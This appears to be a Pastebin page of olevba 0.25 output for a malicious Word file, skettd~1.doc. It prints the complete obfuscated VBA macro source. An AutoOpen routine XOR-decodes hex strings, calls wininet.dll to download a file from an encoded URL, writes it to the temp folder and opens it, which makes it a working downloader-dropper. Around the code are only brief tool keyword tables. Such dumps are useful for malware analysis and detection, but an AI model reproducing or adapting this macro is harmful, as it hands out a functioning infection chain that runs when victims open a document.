Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHBD skettd~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: skettd~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: skettd~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- ZasimSimZa
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO BYP6.bas
- in file: skettd~1.doc - OLE stream: u'Macros/VBA/BYP6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function ZasimSimZa()
- Dim RikoSHET As Long
- RikoSHET = 21
- ETU2BUD3EM1 414, 263
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO BAP5.bas
- in file: skettd~1.doc - OLE stream: u'Macros/VBA/BAP5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function NUCHTOGTISTRASHNAYA(Per3vi4y7 As String, Vt4oro8y89 As String) As String
- Dim Eto4T6Ne9Kak23VSE0 As Integer
- Dim Eto4T6Ne9Kak23VSE01 As Integer
- Dim G3eeeS3GE4W As Double
- G3eeeS3GE4W = 44.77
- G3eeeS3GE4W = G3eeeS3GE4W + Abs(G3eeeS3GE4W)
- Dim Eto4T6Ne9Kak23VSE As Long
- Dim Pet4rush5ka3 As Double
- Dim Eto4T6Ne9Kak23VSEO As String
- Dim SomeDate As Date
- SomeDate = DateAdd("yyyy", 4, "22/11/2003")
- Pet4rush5ka3 = 0
- For Eto4T6Ne9Kak23VSE = 1 To _
- ( _
- Op8Red7ElyAET3 _
- (Vt4oro8y89) _
- / 2)
- Pet4rush5ka3 = Pet4rush5ka3 + 0.1
- Eto4T6Ne9Kak23VSE0 = Val("&H" & _
- (Mid$(Vt4oro8y89, _
- (2 * Eto4T6Ne9Kak23VSE) - 1, 2)))
- Eto4T6Ne9Kak23VSE01 = Asc(Mid$(Per3vi4y7, _
- ((Eto4T6Ne9Kak23VSE Mod Len(Per3vi4y7)) + 1), 1))
- Eto4T6Ne9Kak23VSEO = Eto4T6Ne9Kak23VSEO + Chr(Eto4T6Ne9Kak23VSE0 Xor Eto4T6Ne9Kak23VSE01)
- Next Eto4T6Ne9Kak23VSE
- NUCHTOGTISTRASHNAYA = Eto4T6Ne9Kak23VSEO
- SomeDate = DateAdd("yyyy", 1, SomeDate)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO BEP4.bas
- in file: skettd~1.doc - OLE stream: u'Macros/VBA/BEP4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const VEEWWWEE33211 = "601A0D1E5F4672041D5A5E560C415A025B"
- Public Const HR553366221 = "6F101D16570D035A5D18055743504B08"
- Public Const WREGLEYSPEAR14 = "5B061C0209471C031E0055410A0102001B5B0258561852150D5C47455C1A015F5950435156420501581A075A1D171017"
- Public Const WREGLEYSPEAR13 = "60111A1B431C5A1A0A18715C01506014464708587C0A59170B06"
- Public Const C2332234325 = "h3rhr3h3tm675m53m53m53"
- Public Function RIKAKELLLE2(ByRef SAAARD1 As Object, SomeINCOME As Integer) As Object
- Set RIKAKELLLE2 = SAAARD1.GetSpecialFolder(2)
- End Function
- Public Function ETU2BUD3EM1(RUFRUFRUF As Double, I9PUST5ESHE2 As Integer)
- AUTO1AUTO2 ("CA_LLS_AAAL_CSL_921_29")
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Dridex Strings | Dridex-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO BOP2.bas
- in file: skettd~1.doc - OLE stream: u'Macros/VBA/BOP2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const OOOAOOA12KNEV3 = "KKKALLLLISTO820**02**_____++++"
- Public _
- Function AUTO1AUTO2(CEM7HAZ1 _
- As _
- String)
- VHOD1SU1
- End Function
- Public Function VHOD1SU1()
- Dim T929929T As Object
- Set T929929T = CreateObject _
- (NUCHTOGTISTRASHNAYA(C2332234325, WREGLEYSPEAR13))
- Dim ADeeee11 As Double
- ADeeee11 = 2232.5
- Dim FAAAAE5WT As Long
- FAAAAE5WT = Abs(ADeeee11)
- Dim RUBUBUBUBU2211 As Object
- Set RUBUBUBUBU2211 = RIKAKELLLE2(T929929T, 3444)
- AD34BF54VC11 = 45.5 + 43
- Dim VEEQ332199
- ASDFKJF = NUCHTOGTISTRASHNAYA(C2332234325, HR553366221)
- VEEQ332199 = RUBUBUBUBU2211 & ASDFKJF
- Dim RU8FU7S4 As Integer
- FB2R3RWT4E5WT = Abs(AD34BF54VC11 + 12)
- Dim HI6M8A9DA0 As Integer
- HI6M8A9DA0 = FB2R3RWT4E5WT - AD34BF54VC11
- If BMT74326784(T929929T, VEEQ332199, 1425) Then
- T929929T. _
- DeleteFile VEEQ332199
- End If
- If NEGIZNBILA(VEEQ332199) Then
- End If
- Set SSSS = Nothing
- If BMT74326784(T929929T, VEEQ332199, 2561) Then
- End If
- Set LPOOOO3222333 = CreateObject _
- (NUCHTOGTISTRASHNAYA _
- (C2332234325, VEEWWWEE33211))
- LPOOOO3222333.Open VEEQ332199
- End Function
- Public Sub HHFOOEAKMMANNAN()
- '
- ' dddd Ìàêðîñ
- ' ewh
- '
- Selection.TypeText Text:="hhehalkkcl "
- Selection.TypeParagraph
- Selection.TypeText Text:="sdfjjjfsdjkkdkfkk"
- Selection.TypeParagraph
- Selection.TypeText Text:="dskkdsfkkkfkk"
- Selection.TypeParagraph
- Selection.WholeStory
- Selection.Font.Bold = wdToggle
- Selection.Font.Italic = wdToggle
- If Selection.Font.Underline = wdUnderlineNone Then
- Selection.Font.Underline = wdUnderlineSingle
- Else
- Selection.Font.Underline = wdUnderlineNone
- End If
- If Selection.Font.Underline = wdUnderlineNone Then
- Selection.Font.Underline = wdUnderlineSingle
- Else
- Selection.Font.Underline = wdUnderlineNone
- End If
- Selection.Font.Italic = wdToggle
- Selection.Font.Bold = wdToggle
- Selection.Range.HighlightColorIndex = wdYellow
- Options.DefaultHighlightColorIndex = wdBrightGreen
- Selection.Range.HighlightColorIndex = wdBrightGreen
- Options.DefaultHighlightColorIndex = wdTurquoise
- Selection.Range.HighlightColorIndex = wdTurquoise
- Options.DefaultHighlightColorIndex = wdPink
- Selection.Range.HighlightColorIndex = wdPink
- Options.DefaultHighlightColorIndex = wdTeal
- Selection.Range.HighlightColorIndex = wdTeal
- Selection.Font.Color = wdColorDarkTeal
- Selection.Font.Color = wdColorLightOrange
- Selection.Font.Color = wdColorDarkYellow
- Selection.TypeBackspace
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO BUP3.bas
- in file: skettd~1.doc - OLE stream: u'Macros/VBA/BUP3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function Kud2at3o Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function Reb6ya7ta9 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function Fiz6kul7tur2ra1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As LongPtr, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function ho7Ro8Vo5D1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function Kud2at3o Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function Reb6ya7ta9 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function Fiz6kul7tur2ra1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal etoeshekto23333 As Long, ByVal REKOMDEDEBET1 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function ho7Ro8Vo5D1 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- Public Function Op8Red7ElyAET3(AS1AeW2W3WW As String) As Integer
- Op8Red7ElyAET3 = Len(AS1AeW2W3WW)
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function SomeFunct4(ByRef RUKALICO87 As LongPtr, HLOPUSHKA6 As LongPtr, Hernya As String) As Boolean
- #Else
- Public Function SomeFunct4(ByRef RUKALICO87 As Long, HLOPUSHKA6 As Long, Hernya As String) As Boolean
- #End If
- Dim URLPURL1 As String
- URLPURL1 = NUCHTOGTISTRASHNAYA(C2332234325, WREGLEYSPEAR14)
- RUKALICO87 _
- = ho7Ro8Vo5D1 _
- ( _
- HLOPUSHKA6, _
- URLPURL1, vbNullString, _
- 0, _
- etoeshekto2, 0)
- SomeFunct4 = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO BIP1.bas
- in file: skettd~1.doc - OLE stream: u'Macros/VBA/BIP1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- Private Const NENAKRASHENNAYA872 = 8162
- Private Const NENAKRASHENNAYA871 As String = "Nu Pust Budet tak"
- Private Const NENAKRASHENNAYA999 = 1
- Private Const etoeshekto2 = &H4000000
- Public Function NEGIZNBILA _
- (ByVal PESNYABI As String) As Boolean
- #If VBA7 _
- And Win64 Then
- Dim VMESTO2 As LongPtr, YABIL2 As LongPtr
- #Else
- Dim VMESTO2 As Long, YABIL2 As Long
- #End If
- Dim ETOTYAZABILDAVNO As Long
- Dim REKOMDEDEBET1 As String * NENAKRASHENNAYA872, POKORO4E As String
- Dim SISKAPIR721 As Integer, DLINIYPAREN As Double
- VMESTO2 = Reb6ya7ta9(NENAKRASHENNAYA871, NENAKRASHENNAYA999, vbNullString, vbNullString, 0)
- If VMESTO2 = 0 Then
- Exit Function
- End If
- Dim FiGaMan As Boolean
- If SomeFunct4(YABIL2, VMESTO2, "Popkorn") Then
- End If
- If YABIL2 = 0 Then
- DLINIYPAREN = 0
- Else
- Fiz6kul7tur2ra1 YABIL2, REKOMDEDEBET1, NENAKRASHENNAYA872, ETOTYAZABILDAVNO
- POKORO4E = REKOMDEDEBET1
- Do While ETOTYAZABILDAVNO <> 0
- Fiz6kul7tur2ra1 YABIL2, REKOMDEDEBET1, NENAKRASHENNAYA872, ETOTYAZABILDAVNO
- Dim BEE999999332 As Long
- For BEE999999332 = 14 To 18
- If BEE999999332 = 38 Then End
- Next BEE999999332
- POKORO4E = POKORO4E + Mid(REKOMDEDEBET1, 1, ETOTYAZABILDAVNO)
- Loop
- DLINIYPAREN = Len(POKORO4E): SISKAPIR721 = FreeFile
- Open PESNYABI _
- For Binary Access Write _
- Lock Write _
- As #SISKAPIR721
- Put #SISKAPIR721, _
- , POKORO4E
- Dim HH457457547LLLL As Double
- For HH457457547LLLL = 2 To 3
- If HH457457547LLLL = 37 Then End
- Next HH457457547LLLL
- Close #SISKAPIR721
- End If
- Kud2at3o YABIL2
- Kud2at3o VMESTO2
- POKORO4E = ""
- If DLINIYPAREN Then
- NEGIZNBILA = True
- End If
- End Function
- Public Function BMT74326784(ByRef PLO9 As Object, ByVal ASXXX3 As String, Ribka As Integer) As Boolean
- If PLO9.FileExists(ASXXX3) Then
- BMT74326784 = True
- Else
- BMT74326784 = False
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: skettd~1.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement